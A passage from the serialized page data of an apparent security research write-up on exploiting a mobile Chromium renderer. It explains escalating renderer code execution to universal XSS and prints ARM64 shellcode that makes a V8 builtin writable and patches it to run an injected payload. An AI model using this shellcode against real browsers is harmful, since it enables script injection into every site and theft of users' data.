0},[138178],{"type":33,"value":353},{"type":28,"tag":116,"props":138180,"children":138181},{"style":266},[138182],{"type":33,"value":825},{"type":28,"tag":116,"props":138184,"children":138185},{"style":350},[138186],{"type":33,"value":2794},{"type":28,"tag":116,"props":138188,"children":138189},{"style":266},[138190],{"type":33,"value":825},{"type":28,"tag":116,"props":138192,"children":138193},{"style":350},[138194],{"type":33,"value":138195},"95",{"type":28,"tag":116,"props":138197,"children":138198},{"style":266},[138199],{"type":33,"value":825},{"type":28,"tag":116,"props":138201,"children":138202},{"style":350},[138203],{"type":33,"value":138204},"36",{"type":28,"tag":116,"props":138206,"children":138207},{"style":266},[138208],{"type":33,"value":825},{"type":28,"tag":116,"props":138210,"children":138211},{"style":350},[138212],{"type":33,"value":16957},{"type":28,"tag":116,"props":138214,"children":138215},{"style":266},[138216],{"type":33,"value":825},{"type":28,"tag":116,"props":138218,"children":138219},{"style":350},[138220],{"type":33,"value":138221},"213",{"type":28,"tag":116,"props":138223,"children":138224},{"style":266},[138225],{"type":33,"value":825},{"type":28,"tag":116,"props":138227,"children":138228},{"style":350},[138229],{"type":33,"value":40467},{"type":28,"tag":116,"props":138231,"children":138232},{"style":266},[138233],{"type":33,"value":825},{"type":28,"tag":116,"props":138235,"children":138236},{"style":350},[138237],{"type":33,"value":1824},{"type":28,"tag":116,"props":138239,"children":138240},{"style":266},[138241],{"type":33,"value":825},{"type":28,"tag":116,"props":138243,"children":138244},{"style":350},[138245],{"type":33,"value":29503},{"type":28,"tag":116,"props":138247,"children":138248},{"style":266},[138249],{"type":33,"value":825},{"type":28,"tag":116,"props":138251,"children":138252},{"style":350},[138253],{"type":33,"value":138254},"210",{"type":28,"tag":116,"props":138256,"children":138257},{"style":266},[138258],{"type":33,"value":825},{"type":28,"tag":116,"props":138260,"children":138261},{"style":350},[138262],{"type":33,"value":134201},{"type":28,"tag":116,"props":138264,"children":138265},{"style":266},[138266],{"type":33,"value":825},{"type":28,"tag":116,"props":138268,"children":138269},{"style":350},[138270],{"type":33,"value":138271},"35",{"type":28,"tag":116,"props":138273,"children":138274},{"style":266},[138275],{"type":33,"value":825},{"type":28,"tag":116,"props":138277,"children":138278},{"style":350},[138279],{"type":33,"value":16957},{"type":28,"tag":116,"props":138281,"children":138282},{"style":266},[138283],{"type":33,"value":3178},{"type":28,"tag":116,"props":138285,"children":138286},{"class":245,"line":750},[138287,138292,138296,138301,138305,138310,138314,138319,138323,138328,138332,138337,138341,138346,138350,138354,138358,138362,138366,138370,138374,138378,138382,138386,138390,138395,138399,138404,138408,138412,138416,138420,138424,138428,138432,138436,138440,138444,138448,138453,138457,138462],{"type":28,"tag":116,"props":138288,"children":138289},{"style":350},[138290],{"type":33,"value":138291},"    213",{"type":28,"tag":116,"props":138293,"children":138294},{"style":266},[138295],{"type":33,"value":825},{"type":28,"tag":116,"props":138297,"children":138298},{"style":350},[138299],{"type":33,"value":138300},"231",{"type":28,"tag":116,"props":138302,"children":138303},{"style":266},[138304],{"type":33,"value":825},{"type":28,"tag":116,"props":138306,"children":138307},{"style":350},[138308],{"type":33,"value":138309},"67",{"type":28,"tag":116,"props":138311,"children":138312},{"style":266},[138313],{"type":33,"value":825},{"type":28,"tag":116,"props":138315,"children":138316},{"style":350},[138317],{"type":33,"value":138318},"190",{"type":28,"tag":116,"props":138320,"children":138321},{"style":266},[138322],{"type":33,"value":825},{"type":28,"tag":116,"props":138324,"children":138325},{"style":350},[138326],{"type":33,"value":138327},"169",{"type":28,"tag":116,"props":138329,"children":138330},{"style":266},[138331],{"type":33,"value":825},{"type":28,"tag":116,"props":138333,"children":138334},{"style":350},[138335],{"type":33,"value":138336},"253",{"type":28,"tag":116,"props":138338,"children":138339},{"style":266},[138340],{"type":33,"value":825},{"type":28,"tag":116,"props":138342,"children":138343},{"style":350},[138344],{"type":33,"value":138345},"123",{"type":28,"tag":116,"props":138347,"children":138348},{"style":266},[138349],{"type":33,"value":825},{"type":28,"tag":116,"props":138351,"children":138352},{"style":350},[138353],{"type":33,"value":1824},{"type":28,"tag":116,"props":138355,"children":138356},{"style":266},[138357],{"type":33,"value":825},{"type":28,"tag":116,"props":138359,"children":138360},{"style":350},[138361],{"type":33,"value":138327},{"type":28,"tag":116,"props":138363,"children":138364},{"style":266},[138365],{"type":33,"value":825},{"type":28,"tag":116,"props":138367,"children":138368},{"style":350},[138369],{"type":33,"value":138336},{"type":28,"tag":116,"props":138371,"children":138372},{"style":266},[138373],{"type":33,"value":825},{"type":28,"tag":116,"props":138375,"children":138376},{"style":350},[138377],{"type":33,"value":138309},{"type":28,"tag":116,"props":138379,"children":138380},{"style":266},[138381],{"type":33,"value":825},{"type":28,"tag":116,"props":138383,"children":138384},{"style":350},[138385],{"type":33,"value":353},{"type":28,"tag":116,"props":138387,"children":138388},{"style":266},[138389],{"type":33,"value":825},{"type":28,"tag":116,"props":138391,"children":138392},{"style":350},[138393],{"type":33,"value":138394},"145",{"type":28,"tag":116,"props":138396,"children":138397},{"style":266},[138398],{"type":33,"value":825},{"type":28,"tag":116,"props":138400,"children":138401},{"style":350},[138402],{"type":33,"value":138403},"191",{"type":28,"tag":116,"props":138405,"children":138406},{"style":266},[138407],{"type":33,"value":825},{"type":28,"tag":116,"props":138409,"children":138410},{"style":350},[138411],{"type":33,"value":16957},{"type":28,"tag":116,"props":138413,"children":138414},{"style":266},[138415],{"type":33,"value":825},{"type":28,"tag":116,"props":138417,"children":138418},{"style":350},[138419],{"type":33,"value":353},{"type":28,"tag":116,"props":138421,"children":138422},{"style":266},[138423],{"type":33,"value":825},{"type":28,"tag":116,"props":138425,"children":138426},{"style":350},[138427],{"type":33,"value":138394},{"type":28,"tag":116,"props":138429,"children":138430},{"style":266},[138431],{"type":33,"value":825},{"type":28,"tag":116,"props":138433,"children":138434},{"style":350},[138435],{"type":33,"value":138336},{"type":28,"tag":116,"props":138437,"children":138438},{"style":266},[138439],{"type":33,"value":825},{"type":28,"tag":116,"props":138441,"children":138442},{"style":350},[138443],{"type":33,"value":138345},{"type":28,"tag":116,"props":138445,"children":138446},{"style":266},[138447],{"type":33,"value":825},{"type":28,"tag":116,"props":138449,"children":138450},{"style":350},[138451],{"type":33,"value":138452},"193",{"type":28,"tag":116,"props":138454,"children":138455},{"style":266},[138456],{"type":33,"value":825},{"type":28,"tag":116,"props":138458,"children":138459},{"style":350},[138460],{"type":33,"value":138461},"168",{"type":28,"tag":116,"props":138463,"children":138464},{"style":266},[138465],{"type":33,"value":3178},{"type":28,"tag":116,"props":138467,"children":138468},{"class":245,"line":779},[138469,138474,138478,138482,138486,138490,138494,138498,138502,138506,138510,138514,138518,138522,138526,138531,138535,138539,138543,138547,138551,138555,138559,138563,138567,138571,138575,138579,138583,138587,138591,138595,138599,138603,138607,138611,138615,138619,138623,138627,138631,138635,138639,138643,138647,138651,138655,138659,138663,138667,138671,138675,138679,138683],{"type":28,"tag":116,"props":138470,"children":138471},{"style":350},[138472],{"type":33,"value":138473},"    255",{"type":28,"tag":116,"props":138475,"children":138476},{"style":266},[138477],{"type":33,"value":825},{"type":28,"tag":116,"props":138479,"children":138480},{"style":350},[138481],{"type":33,"value":138271},{"type":28,"tag":116,"props":138483,"children":138484},{"style":266},[138485],{"type":33,"value":825},{"type":28,"tag":116,"props":138487,"children":138488},{"style":350},[138489],{"type":33,"value":16957},{"type":28,"tag":116,"props":138491,"children":138492},{"style":266},[138493],{"type":33,"value":825},{"type":28,"tag":116,"props":138495,"children":138496},{"style":350},[138497],{"type":33,"value":138221},{"type":28,"tag":116,"props":138499,"children":138500},{"style":266},[138501],{"type":33,"value":825},{"type":28,"tag":116,"props":138503,"children":138504},{"style":350},[138505],{"type":33,"value":134156},{"type":28,"tag":116,"props":138507,"children":138508},{"style":266},[138509],{"type":33,"value":825},{"type":28,"tag":116,"props":138511,"children":138512},{"style":350},[138513],{"type":33,"value":16957},{"type":28,"tag":116,"props":138515,"children":138516},{"style":266},[138517],{"type":33,"value":825},{"type":28,"tag":116,"props":138519,"children":138520},{"style":350},[138521],{"type":33,"value":138195},{"type":28,"tag":116,"props":138523,"children":138524},{"style":266},[138525],{"type":33,"value":825},{"type":28,"tag":116,"props":138527,"children":138528},{"style":350},[138529],{"type":33,"value":138530},"214",{"type":28,"tag":116,"props":138532,"children":138533},{"style":266},[138534],{"type":33,"value":825},{"type":28,"tag":116,"props":138536,"children":138537},{"style":350},[138538],{"type":33,"value":96283},{"type":28,"tag":116,"props":138540,"children":138541},{"style":266},[138542],{"type":33,"value":825},{"type":28,"tag":116,"props":138544,"children":138545},{"style":350},[138546],{"type":33,"value":59965},{"type":28,"tag":116,"props":138548,"children":138549},{"style":266},[138550],{"type":33,"value":825},{"type":28,"tag":116,"props":138552,"children":138553},{"style":350},[138554],{"type":33,"value":16957},{"type":28,"tag":116,"props":138556,"children":138557},{"style":266},[138558],{"type":33,"value":825},{"type":28,"tag":116,"props":138560,"children":138561},{"style":350},[138562],{"type":33,"value":138221},{"type":28,"tag":116,"props":138564,"children":138565},{"style":266},[138566],{"type":33,"value":825},{"type":28,"tag":116,"props":138568,"children":138569},{"style":350},[138570],{"type":33,"value":17190},{"type":28,"tag":116,"props":138572,"children":138573},{"style":266},[138574],{"type":33,"value":825},{"type":28,"tag":116,"props":138576,"children":138577},{"style":350},[138578],{"type":33,"value":353},{"type":28,"tag":116,"props":138580,"children":138581},{"style":266},[138582],{"type":33,"value":825},{"type":28,"tag":116,"props":138584,"children":138585},{"style":350},[138586],{"type":33,"value":353},{"type":28,"tag":116,"props":138588,"children":138589},{"style":266},[138590],{"type":33,"value":825},{"type":28,"tag":116,"props":138592,"children":138593},{"style":350},[138594],{"type":33,"value":353},{"type":28,"tag":116,"props":138596,"children":138597},{"style":266},[138598],{"type":33,"value":825},{"type":28,"tag":116,"props":138600,"children":138601},{"style":350},[138602],{"type":33,"value":353},{"type":28,"tag":116,"props":138604,"children":138605},{"style":266},[138606],{"type":33,"value":825},{"type":28,"tag":116,"props":138608,"children":138609},{"style":350},[138610],{"type":33,"value":353},{"type":28,"tag":116,"props":138612,"children":138613},{"style":266},[138614],{"type":33,"value":825},{"type":28,"tag":116,"props":138616,"children":138617},{"style":350},[138618],{"type":33,"value":353},{"type":28,"tag":116,"props":138620,"children":138621},{"style":266},[138622],{"type":33,"value":825},{"type":28,"tag":116,"props":138624,"children":138625},{"style":350},[138626],{"type":33,"value":353},{"type":28,"tag":116,"props":138628,"children":138629},{"style":266},[138630],{"type":33,"value":825},{"type":28,"tag":116,"props":138632,"children":138633},{"style":350},[138634],{"type":33,"value":353},{"type":28,"tag":116,"props":138636,"children":138637},{"style":266},[138638],{"type":33,"value":825},{"type":28,"tag":116,"props":138640,"children":138641},{"style":350},[138642],{"type":33,"value":17190},{"type":28,"tag":116,"props":138644,"children":138645},{"style":266},[138646],{"type":33,"value":825},{"type":28,"tag":116,"props":138648,"children":138649},{"style":350},[138650],{"type":33,"value":353},{"type":28,"tag":116,"props":138652,"children":138653},{"style":266},[138654],{"type":33,"value":825},{"type":28,"tag":116,"props":138656,"children":138657},{"style":350},[138658],{"type":33,"value":353},{"type":28,"tag":116,"props":138660,"children":138661},{"style":266},[138662],{"type":33,"value":825},{"type":28,"tag":116,"props":138664,"children":138665},{"style":350},[138666],{"type":33,"value":353},{"type":28,"tag":116,"props":138668,"children":138669},{"style":266},[138670],{"type":33,"value":825},{"type":28,"tag":116,"props":138672,"children":138673},{"style":350},[138674],{"type":33,"value":353},{"type":28,"tag":116,"props":138676,"children":138677},{"style":266},[138678],{"type":33,"value":825},{"type":28,"tag":116,"props":138680,"children":138681},{"style":350},[138682],{"type":33,"value":353},{"type":28,"tag":116,"props":138684,"children":138685},{"style":266},[138686],{"type":33,"value":3178},{"type":28,"tag":116,"props":138688,"children":138689},{"class":245,"line":796},[138690,138694,138698,138702,138706,138710,138714,138718,138722,138726,138730,138735,138739,138744,138748,138753,138757,138761],{"type":28,"tag":116,"props":138691,"children":138692},{"style":350},[138693],{"type":33,"value":133808},{"type":28,"tag":116,"props":138695,"children":138696},{"style":266},[138697],{"type":33,"value":825},{"type":28,"tag":116,"props":138699,"children":138700},{"style":350},[138701],{"type":33,"value":353},{"type":28,"tag":116,"props":138703,"children":138704},{"style":266},[138705],{"type":33,"value":825},{"type":28,"tag":116,"props":138707,"children":138708},{"style":350},[138709],{"type":33,"value":353},{"type":28,"tag":116,"props":138711,"children":138712},{"style":266},[138713],{"type":33,"value":825},{"type":28,"tag":116,"props":138715,"children":138716},{"style":350},[138717],{"type":33,"value":353},{"type":28,"tag":116,"props":138719,"children":138720},{"style":266},[138721],{"type":33,"value":825},{"type":28,"tag":116,"props":138723,"children":138724},{"style":350},[138725],{"type":33,"value":353},{"type":28,"tag":116,"props":138727,"children":138728},{"style":266},[138729],{"type":33,"value":825},{"type":28,"tag":116,"props":138731,"children":138732},{"style":350},[138733],{"type":33,"value":138734},"92",{"type":28,"tag":116,"props":138736,"children":138737},{"style":266},[138738],{"type":33,"value":825},{"type":28,"tag":116,"props":138740,"children":138741},{"style":350},[138742],{"type":33,"value":138743},"50",{"type":28,"tag":116,"props":138745,"children":138746},{"style":266},[138747],{"type":33,"value":825},{"type":28,"tag":116,"props":138749,"children":138750},{"style":350},[138751],{"type":33,"value":138752},"162",{"type":28,"tag":116,"props":138754,"children":138755},{"style":266},[138756],{"type":33,"value":825},{"type":28,"tag":116,"props":138758,"children":138759},{"style":350},[138760],{"type":33,"value":353},{"type":28,"tag":116,"props":138762,"children":138763},{"style":266},[138764],{"type":33,"value":3178},{"type":28,"tag":116,"props":138766,"children":138767},{"class":245,"line":847},[138768],{"type":28,"tag":116,"props":138769,"children":138770},{"style":266},[138771],{"type":33,"value":134095},{"type":28,"tag":116,"props":138773,"children":138774},{"class":245,"line":898},[138775,138779,138783,138787,138791,138795,138799,138803,138807,138811,138815],{"type":28,"tag":116,"props":138776,"children":138777},{"style":376},[138778],{"type":33,"value":7527},{"type":28,"tag":116,"props":138780,"children":138781},{"style":272},[138782],{"type":33,"value":135548},{"type":28,"tag":116,"props":138784,"children":138785},{"style":370},[138786],{"type":33,"value":2226},{"type":28,"tag":116,"props":138788,"children":138789},{"style":282},[138790],{"type":33,"value":135557},{"type":28,"tag":116,"props":138792,"children":138793},{"style":266},[138794],{"type":33,"value":313},{"type":28,"tag":116,"props":138796,"children":138797},{"style":272},[138798],{"type":33,"value":133426},{"type":28,"tag":116,"props":138800,"children":138801},{"style":266},[138802],{"type":33,"value":825},{"type":28,"tag":116,"props":138804,"children":138805},{"style":272},[138806],{"type":33,"value":124755},{"type":28,"tag":116,"props":138808,"children":138809},{"style":266},[138810],{"type":33,"value":141},{"type":28,"tag":116,"props":138812,"children":138813},{"style":272},[138814],{"type":33,"value":124755},{"type":28,"tag":116,"props":138816,"children":138817},{"style":266},[138818],{"type":33,"value":895},{"type":28,"tag":116,"props":138820,"children":138821},{"class":245,"line":907},[138822,138826,138830,138834,138838,138842,138846,138850,138854,138858],{"type":28,"tag":116,"props":138823,"children":138824},{"style":272},[138825],{"type":33,"value":135593},{"type":28,"tag":116,"props":138827,"children":138828},{"style":370},[138829],{"type":33,"value":2226},{"type":28,"tag":116,"props":138831,"children":138832},{"style":266},[138833],{"type":33,"value":269},{"type":28,"tag":116,"props":138835,"children":138836},{"style":260},[138837],{"type":33,"value":1091},{"type":28,"tag":116,"props":138839,"children":138840},{"style":272},[138841],{"type":33,"value":135548},{"type":28,"tag":116,"props":138843,"children":138844},{"style":266},[138845],{"type":33,"value":141},{"type":28,"tag":116,"props":138847,"children":138848},{"style":282},[138849],{"type":33,"value":57184},{"type":28,"tag":116,"props":138851,"children":138852},{"style":266},[138853],{"type":33,"value":135622},{"type":28,"tag":116,"props":138855,"children":138856},{"style":272},[138857],{"type":33,"value":38773},{"type":28,"tag":116,"props":138859,"children":138860},{"style":266},[138861],{"type":33,"value":384},{"type":28,"tag":116,"props":138863,"children":138864},{"class":245,"line":981},[138865,138869,138873,138877,138881,138886,138890,138894],{"type":28,"tag":116,"props":138866,"children":138867},{"style":272},[138868],{"type":33,"value":101558},{"type":28,"tag":116,"props":138870,"children":138871},{"style":266},[138872],{"type":33,"value":141},{"type":28,"tag":116,"props":138874,"children":138875},{"style":282},[138876],{"type":33,"value":101567},{"type":28,"tag":116,"props":138878,"children":138879},{"style":266},[138880],{"type":33,"value":313},{"type":28,"tag":116,"props":138882,"children":138883},{"style":563},[138884],{"type":33,"value":138885},"'DeserializeWasmModule result: '",{"type":28,"tag":116,"props":138887,"children":138888},{"style":370},[138889],{"type":33,"value":2258},{"type":28,"tag":116,"props":138891,"children":138892},{"style":272},[138893],{"type":33,"value":8828},{"type":28,"tag":116,"props":138895,"children":138896},{"style":266},[138897],{"type":33,"value":895},{"type":28,"tag":116,"props":138899,"children":138900},{"class":245,"line":1011},[138901,138905,138909,138913,138917,138921,138925,138929,138933,138937],{"type":28,"tag":116,"props":138902,"children":138903},{"style":376},[138904],{"type":33,"value":35814},{"type":28,"tag":116,"props":138906,"children":138907},{"style":272},[138908],{"type":33,"value":135642},{"type":28,"tag":116,"props":138910,"children":138911},{"style":370},[138912],{"type":33,"value":2226},{"type":28,"tag":116,"props":138914,"children":138915},{"style":376},[138916],{"type":33,"value":31582},{"type":28,"tag":116,"props":138918,"children":138919},{"style":272},[138920],{"type":33,"value":133409},{"type":28,"tag":116,"props":138922,"children":138923},{"style":266},[138924],{"type":33,"value":141},{"type":28,"tag":116,"props":138926,"children":138927},{"style":282},[138928],{"type":33,"value":133463},{"type":28,"tag":116,"props":138930,"children":138931},{"style":266},[138932],{"type":33,"value":313},{"type":28,"tag":116,"props":138934,"children":138935},{"style":272},[138936],{"type":33,"value":8751},{"type":28,"tag":116,"props":138938,"children":138939},{"style":266},[138940],{"type":33,"value":895},{"type":28,"tag":116,"props":138942,"children":138943},{"class":245,"line":1029},[138944,138948,138952,138956,138960,138964,138968,138972,138976],{"type":28,"tag":116,"props":138945,"children":138946},{"style":376},[138947],{"type":33,"value":35814},{"type":28,"tag":116,"props":138949,"children":138950},{"style":272},[138951],{"type":33,"value":32605},{"type":28,"tag":116,"props":138953,"children":138954},{"style":370},[138955],{"type":33,"value":2226},{"type":28,"tag":116,"props":138957,"children":138958},{"style":272},[138959],{"type":33,"value":135642},{"type":28,"tag":116,"props":138961,"children":138962},{"style":266},[138963],{"type":33,"value":141},{"type":28,"tag":116,"props":138965,"children":138966},{"style":272},[138967],{"type":33,"value":37509},{"type":28,"tag":116,"props":138969,"children":138970},{"style":266},[138971],{"type":33,"value":141},{"type":28,"tag":116,"props":138973,"children":138974},{"style":272},[138975],{"type":33,"value":133512},{"type":28,"tag":116,"props":138977,"children":138978},{"style":266},[138979],{"type":33,"value":384},{"type":28,"tag":116,"props":138981,"children":138982},{"class":245,"line":1038},[138983,138987,138991,138995,138999,139003],{"type":28,"tag":116,"props":138984,"children":138985},{"style":272},[138986],{"type":33,"value":101558},{"type":28,"tag":116,"props":138988,"children":138989},{"style":266},[138990],{"type":33,"value":141},{"type":28,"tag":116,"props":138992,"children":138993},{"style":282},[138994],{"type":33,"value":101567},{"type":28,"tag":116,"props":138996,"children":138997},{"style":266},[138998],{"type":33,"value":313},{"type":28,"tag":116,"props":139000,"children":139001},{"style":272},[139002],{"type":33,"value":32719},{"type":28,"tag":116,"props":139004,"children":139005},{"style":266},[139006],{"type":33,"value":895},{"type":28,"tag":116,"props":139008,"children":139009},{"class":245,"line":1047},[139010],{"type":28,"tag":116,"props":139011,"children":139012},{"style":266},[139013],{"type":33,"value":101599},{"type":28,"tag":29,"props":139015,"children":139016},{},[139017],{"type":33,"value":139018},"And this time, it works as expected:",{"type":28,"tag":29,"props":139020,"children":139021},{},[139022],{"type":28,"tag":206,"props":139023,"children":139026},{"alt":139024,"src":139025},"image3","/posts/mobile-renderer-rce/image3.png",[],{"type":28,"tag":75,"props":139028,"children":139030},{"id":139029},"achieving-universal-xss",[139031],{"type":33,"value":139032},"Achieving Universal XSS",{"type":28,"tag":29,"props":139034,"children":139035},{},[139036,139038,139044,139046,139053],{"type":33,"value":139037},"At this point, we have arbitrary shellcode execution in the renderer process. While usually the exploit stops here and further access would require a browser sandbox escape, we decided to explore an alternative route known as UXSS, inspired by this ",{"type":28,"tag":87,"props":139039,"children":139042},{"href":139040,"rel":139041},"https://i.blackhat.com/Asia-24/Presentations/Asia-24-Liu-The-Hole-in-Sandbox.pdf",[91],[139043],{"type":33,"value":69951},{"type":33,"value":139045}," from Tencent Security and ",{"type":28,"tag":87,"props":139047,"children":139050},{"href":139048,"rel":139049},"https://www.interruptlabs.co.uk/articles/one-click-memory-corruption-in-alibabas-uc-browser-exploiting-patch-gap-v8-vulnerabilities-to-steal-your-data",[91],[139051],{"type":33,"value":139052},"research article",{"type":33,"value":139054}," from InterruptLabs.",{"type":28,"tag":29,"props":139056,"children":139057},{},[139058,139060,139067],{"type":33,"value":139059},"Unlike a normal XSS, a UXSS, or universal XSS, is a client side browser exploit that enables arbitrary JavaScript injection in all pages of a website. Normally, site isolation on desktop Chromium prevents this, as each site ends up in a different renderer process, but Android specifically has a ",{"type":28,"tag":87,"props":139061,"children":139064},{"href":139062,"rel":139063},"https://www.chromium.org/Home/chromium-security/site-isolation/#android",[91],[139065],{"type":33,"value":139066},"weaker version",{"type":33,"value":139068}," of this mitigation - only sites with logins and COOP headers are per process isolated. This means that the majority of webpages are in the same renderer process, so any patches to the interpreter will affect them all and lead to UXSS. This is still quite the capability!",{"type":28,"tag":29,"props":139070,"children":139071},{},[139072,139074,139080],{"type":33,"value":139073},"To achieve UXSS, we need to patch a function that’s invoked during site loading so we can run our XSS payload. During debugging, we observed that every site we visited eventually called ",{"type":28,"tag":98,"props":139075,"children":139077},{"className":139076},[],[139078],{"type":33,"value":139079},"Builtins_ConstructFunction",{"type":33,"value":139081},", making it a natural target.",{"type":28,"tag":29,"props":139083,"children":139084},{},[139085,139087,139092],{"type":33,"value":139086},"Our goal is for ",{"type":28,"tag":98,"props":139088,"children":139090},{"className":139089},[],[139091],{"type":33,"value":139079},{"type":33,"value":139093}," to execute our XSS payload first, then continue its normal behavior. To do this, we hook it as follows:",{"type":28,"tag":2108,"props":139095,"children":139096},{},[139097,139102,139112],{"type":28,"tag":459,"props":139098,"children":139099},{},[139100],{"type":33,"value":139101},"The exploit’s shellcode patches the first few instructions to redirect execution to our mmap-ed shellcode, which runs the XSS payload",{"type":28,"tag":459,"props":139103,"children":139104},{},[139105,139107],{"type":33,"value":139106},"After finishing, the mmap-ed shellcode restores the original instructions in ",{"type":28,"tag":98,"props":139108,"children":139110},{"className":139109},[],[139111],{"type":33,"value":139079},{"type":28,"tag":459,"props":139113,"children":139114},{},[139115,139117,139122],{"type":33,"value":139116},"The mmap-ed shellcode then returns to the beginning of ",{"type":28,"tag":98,"props":139118,"children":139120},{"className":139119},[],[139121],{"type":33,"value":139079},{"type":33,"value":139123},", which now proceeds normally",{"type":28,"tag":29,"props":139125,"children":139126},{},[139127],{"type":33,"value":139128},"The ARM64 shellcode implementing this looks as follows:",{"type":28,"tag":234,"props":139130,"children":139134},{"code":139131,"language":139132,"meta":7,"className":139133,"style":7},"// get return addr to x0\nldr x0, [sp, #0x18]\n// strip pac signature from return address\n.arch armv8.3-a; xpaci x0\n\n// store x5 = Builtins_ConstructFunction\nmovz x1, #0x610c\nsub x0, x0, x1\nmov x5, x0\n\n// store x4 = page aligned ConstructFunction\nmovz x1, #0xf000\nmovk x1, #0xffff, lsl #16\nmovk x1, #0xffff, lsl #32\nand x4, x5, x1\n\n// mprotect page aligned ConstructFunction RWX\nmov x0, x4\nmov x1, #0x2000\nmov x2, #0x7\nmov x8, #226\nsvc #0\n\nmov x6, x5\n\n// mmap RWX for jump dest (uxss_sc)\nmov x0, #0\nmov x1, #0x1000\nmov x2, #0x7\nmov x3, #34\nmov x4, #-1\nmov x5, #0\nmov x8, #222\nsvc #0\n\nmov x5, x0\n\n// at this point:\n// x6 = Builtins_ConstructFunction\n// x5 = mmap page for uxss_sc\n\n// write uxss_sc to mmaped rwx page\n{write_sc(uxss_sc, \"x5\")}\n\n// wipe from cache\nmov x0, x5\n{WIPE_CACHE}\n\n// patch Builtins_ConstructFunction\n{write_sc(new_compile_instrs, \"x6\")}\n// and add a pointer to uxss_sc just above new instructions\nstr x5, [x6, #{5 * INSTR_SIZE}]\n\n// wipe from cache\nmov x0, x6\n{WIPE_CACHE}\n","asm","language-asm shiki shiki-themes slack-dark",[139135],{"type":28,"tag":98,"props":139136,"children":139137},{"__ignoreMap":7},[139138,139146,139154,139162,139170,139177,139185,139193,139201,139209,139216,139224,139232,139240,139248,139256,139263,139271,139279,139287,139295,139303,139311,139318,139326,139333,139341,139349,139357,139364,139372,139380,139388,139396,139403,139410,139417,139424,139432,139440,139448,139455,139463,139471,139478,139486,139494,139502,139509,139517,139525,139533,139541,139548,139555,139563],{"type":28,"tag":116,"props":139139,"children":139140},{"class":245,"line":246},[139141],{"type":28,"tag":116,"props":139142,"children":139143},{},[139144],{"type":33,"value":139145},"// get return addr to x0\n",{"type":28,"tag":116,"props":139147,"children":139148},{"class":245,"line":256},[139149],{"type":28,"tag":116,"props":139150,"children":139151},{},[139152],{"type":33,"value":139153},"ldr x0, [sp, #0x18]\n",{"type":28,"tag":116,"props":139155,"children":139156},{"class":245,"line":293},[139157],{"type":28,"tag":116,"props":139158,"children":139159},{},[139160],{"type":33,"value":139161},"// strip pac signature from return address\n",{"type":28,"tag":116,"props":139163,"children":139164},{"class":245,"line":361},[139165],{"type":28,"tag":116,"props":139166,"children":139167},{},[139168],{"type":33,"value":139169},".arch armv8.3-a; xpaci x0\n",{"type":28,"tag":116,"props":139171,"children":139172},{"class":245,"line":387},[139173],{"type":28,"tag":116,"props":139174,"children":139175},{"emptyLinePlaceholder":19},[139176],{"type":33,"value":1044},{"type":28,"tag":116,"props":139178,"children":139179},{"class":245,"line":400},[139180],{"type":28,"tag":116,"props":139181,"children":139182},{},[139183],{"type":33,"value":139184},"// store x5 = Builtins_ConstructFunction\n",{"type":28,"tag":116,"props":139186,"children":139187},{"class":245,"line":614},[139188],{"type":28,"tag":116,"props":139189,"children":139190},{},[139191],{"type":33,"value":139192},"movz x1, #0x610c\n",{"type":28,"tag":116,"props":139194,"children":139195},{"class":245,"line":631},[139196],{"type":28,"tag":116,"props":139197,"children":139198},{},[139199],{"type":33,"value":139200},"sub x0, x0, x1\n",{"type":28,"tag":116,"props":139202,"children":139203},{"class":245,"line":665},[139204],{"type":28,"tag":116,"props":139205,"children":139206},{},[139207],{"type":33,"value":139208},"mov x5, x0\n",{"type":28,"tag":116,"props":139210,"children":139211},{"class":245,"line":713},[139212],{"type":28,"tag":116,"props":139213,"children":139214},{"emptyLinePlaceholder":19},[139215],{"type":33,"value":1044},{"type":28,"tag":116,"props":139217,"children":139218},{"class":245,"line":750},[139219],{"type":28,"tag":116,"props":139220,"children":139221},{},[139222],{"type":33,"value":139223},"// store x4 = page aligned ConstructFunction\n",{"type":28,"tag":116,"props":139225,"children":139226},{"class":245,"line":779},[139227],{"type":28,"tag":116,"props":139228,"children":139229},{},[139230],{"type":33,"value":139231},"movz x1, #0xf000\n",{"type":28,"tag":116,"props":139233,"children":139234},{"class":245,"line":796},[139235],{"type":28,"tag":116,"props":139236,"children":139237},{},[139238],{"type":33,"value":139239},"movk x1, #0xffff, lsl #16\n",{"type":28,"tag":116,"props":139241,"children":139242},{"class":245,"line":847},[139243],{"type":28,"tag":116,"props":139244,"children":139245},{},[139246],{"type":33,"value":139247},"movk x1, #0xffff, lsl #32\n",{"type":28,"tag":116,"props":139249,"children":139250},{"class":245,"line":898},[139251],{"type":28,"tag":116,"props":139252,"children":139253},{},[139254],{"type":33,"value":139255},"and x4, x5, x1\n",{"type":28,"tag":116,"props":139257,"children":139258},{"class":245,"line":907},[139259],{"type":28,"tag":116,"props":139260,"children":139261},{"emptyLinePlaceholder":19},[139262],{"type":33,"value":1044},{"type":28,"tag":116,"props":139264,"children":139265},{"class":245,"line":981},[139266],{"type":28,"tag":116,"props":139267,"children":139268},{},[139269],{"type":33,"value":139270},"// mprotect page aligned ConstructFunction RWX\n",{"type":28,"tag":116,"props":139272,"children":139273},{"class":245,"line":1011},[139274],{"type":28,"tag":116,"props":139275,"children":139276},{},[139277],{"type":33,"value":139278},"mov x0, x4\n",{"type":28,"tag":116,"props":139280,"children":139281},{"class":245,"line":1029},[139282],{"type":28,"tag":116,"props":139283,"children":139284},{},[139285],{"type":33,"value":139286},"mov x1, #0x2000\n",{"type":28,"tag":116,"props":139288,"children":139289},{"class":245,"line":1038},[139290],{"type":28,"tag":116,"props":139291,"children":139292},{},[139293],{"type":33,"value":139294},"mov x2, #0x7\n",{"type":28,"tag":116,"props":139296,"children":139297},{"class":245,"line":1047},[139298],{"type":28,"tag":116,"props":139299,"children":139300},{},[139301],{"type":33,"value":139302},"mov x8, #226\n",{"type":28,"tag":116,"props":139304,"children":139305},{"class":245,"line":1071},[139306],{"type":28,"tag":116,"props":139307,"children":139308},{},[139309],{"type":33,"value":139310},"svc #0\n",{"type":28,"tag":116,"props":139312,"children":139313},{"class":245,"line":1137},[139314],{"type":28,"tag":116,"props":139315,"children":139316},{"emptyLinePlaceholder":19},[139317],{"type":33,"value":1044},{"type":28,"tag":116,"props":139319,"children":139320},{"class":245,"line":1181},[139321],{"type":28,"tag":116,"props":139322,"children":139323},{},[139324],{"type":33,"value":139325},"mov x6, 